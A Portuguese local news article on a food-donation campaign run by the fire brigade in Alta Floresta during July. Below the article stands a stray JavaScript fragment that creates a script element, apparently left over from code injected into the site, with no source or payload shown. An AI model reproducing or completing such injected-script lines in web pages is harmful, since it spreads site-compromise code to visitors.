Capa / Em Destaque / Corpo de Bombeiros de Alta Floresta realizam campanha de arrecadação de alimentos

Corpo de Bombeiros de Alta Floresta realizam campanha de arrecadação de alimentos

arquivos_853_conteudo_posts_386851_jpg_350_350_1_0__

Foto: Ilustrativa

Fonte: Eliza Gund/ Nativa News

Teve início no último dia 01 de julho, a 1ª Edição da Campanha Bombeiros Solidários. A campanha acontece em todo o Estado e também realizada pela 7ª Companhia Independente de Bombeiros Militar (CIBM) em Alta Floresta.

Durante os dias 01 a 28 de julho, o Corpo de Bombeiros Militar, estará recebendo doações de alimentos não perecíveis que serão entregues às instituições de caridade dos municípios onde há quarteis da corporação.

“A ação social elaborada pelo comando pretende incentivar prática da solidariedade, companheirismo, respeito e cooperação. Além do mais, a campanha ocorre no mês em que se comemorou o Dia Nacional do Bombeiro (02/07). Dessa forma a celebração acontece de uma maneira diferente e solidária”, relata Tenente Lucas da 7ª CIBM.

De acordo com o Tenente, as doações podem ser feitas por qualquer pessoa e entregues no Quartel, localizado na Perimetral Rogério Silva, esquina com setor B, em qualquer horário. “O encerramento da campanha esta previsto para o dia 29. Data em que simultaneamente em todo Estado, as instituições contempladas receberão as doações”, pontuou Tenente Lucas.

 var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top